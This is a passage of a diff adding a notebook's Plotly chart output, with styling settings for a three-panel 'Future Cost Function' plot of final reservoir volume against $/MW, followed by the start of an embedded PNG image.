+ "#EF553B",
+ "#00cc96",
+ "#ab63fa",
+ "#FFA15A",
+ "#19d3f3",
+ "#FF6692",
+ "#B6E880",
+ "#FF97FF",
+ "#FECB52"
+ ],
+ "font": {
+ "color": "#2a3f5f"
+ },
+ "geo": {
+ "bgcolor": "white",
+ "lakecolor": "white",
+ "landcolor": "#E5ECF6",
+ "showlakes": true,
+ "showland": true,
+ "subunitcolor": "white"
+ },
+ "hoverlabel": {
+ "align": "left"
+ },
+ "hovermode": "closest",
+ "mapbox": {
+ "style": "light"
+ },
+ "paper_bgcolor": "white",
+ "plot_bgcolor": "#E5ECF6",
+ "polar": {
+ "angularaxis": {
+ "gridcolor": "white",
+ "linecolor": "white",
+ "ticks": ""
+ },
+ "bgcolor": "#E5ECF6",
+ "radialaxis": {
+ "gridcolor": "white",
+ "linecolor": "white",
+ "ticks": ""
+ }
+ },
+ "scene": {
+ "xaxis": {
+ "backgroundcolor": "#E5ECF6",
+ "gridcolor": "white",
+ "gridwidth": 2,
+ "linecolor": "white",
+ "showbackground": true,
+ "ticks": "",
+ "zerolinecolor": "white"
+ },
+ "yaxis": {
+ "backgroundcolor": "#E5ECF6",
+ "gridcolor": "white",
+ "gridwidth": 2,
+ "linecolor": "white",
+ "showbackground": true,
+ "ticks": "",
+ "zerolinecolor": "white"
+ },
+ "zaxis": {
+ "backgroundcolor": "#E5ECF6",
+ "gridcolor": "white",
+ "gridwidth": 2,
+ "linecolor": "white",
+ "showbackground": true,
+ "ticks": "",
+ "zerolinecolor": "white"
+ }
+ },
+ "shapedefaults": {
+ "line": {
+ "color": "#2a3f5f"
+ }
+ },
+ "ternary": {
+ "aaxis": {
+ "gridcolor": "white",
+ "linecolor": "white",
+ "ticks": ""
+ },
+ "baxis": {
+ "gridcolor": "white",
+ "linecolor": "white",
+ "ticks": ""
+ },
+ "bgcolor": "#E5ECF6",
+ "caxis": {
+ "gridcolor": "white",
+ "linecolor": "white",
+ "ticks": ""
+ }
+ },
+ "title": {
+ "x": 0.05
+ },
+ "xaxis": {
+ "automargin": true,
+ "gridcolor": "white",
+ "linecolor": "white",
+ "ticks": "",
+ "title": {
+ "standoff": 15
+ },
+ "zerolinecolor": "white",
+ "zerolinewidth": 2
+ },
+ "yaxis": {
+ "automargin": true,
+ "gridcolor": "white",
+ "linecolor": "white",
+ "ticks": "",
+ "title": {
+ "standoff": 15
+ },
+ "zerolinecolor": "white",
+ "zerolinewidth": 2
+ }
+ }
+ },
+ "title": {
+ "text": "Future Cost Function"
+ },
+ "xaxis": {
+ "anchor": "y",
+ "autorange": true,
+ "domain": [
+ 0,
+ 1
+ ],
+ "range": [
+ 20,
+ 100
+ ],
+ "title": {
+ "text": "Final Volume [hm3]"
+ },
+ "type": "linear"
+ },
+ "xaxis2": {
+ "anchor": "y2",
+ "autorange": true,
+ "domain": [
+ 0,
+ 1
+ ],
+ "range": [
+ 20,
+ 100
+ ],
+ "title": {
+ "text": "Final Volume [hm3]"
+ },
+ "type": "linear"
+ },
+ "xaxis3": {
+ "anchor": "y3",
+ "autorange": true,
+ "domain": [
+ 0,
+ 1
+ ],
+ "range": [
+ 20,
+ 100
+ ],
+ "title": {
+ "text": "Final Volume [hm3]"
+ },
+ "type": "linear"
+ },
+ "yaxis": {
+ "anchor": "x",
+ "autorange": true,
+ "domain": [
+ 0.7333333333333333,
+ 1
+ ],
+ "range": [
+ -686.2822222222221,
+ 16272.962222222222
+ ],
+ "title": {
+ "text": "$/MW"
+ },
+ "type": "linear"
+ },
+ "yaxis2": {
+ "anchor": "x2",
+ "autorange": true,
+ "domain": [
+ 0.36666666666666664,
+ 0.6333333333333333
+ ],
+ "range": [
+ -654.2066666666667,
+ 12442.326666666666
+ ],
+ "title": {
+ "text": "$/MW"
+ },
+ "type": "linear"
+ },
+ "yaxis3": {
+ "anchor": "x3",
+ "autorange": true,
+ "domain": [
+ 0,
+ 0.26666666666666666
+ ],
+ "range": [
+ -373.61111111111114,
+ 7098.611111111111
+ ],
+ "title": {
+ "text": "$/MW"
+ },
+ "type": "linear"
+ }
+ }
+ },
+ "image/png": "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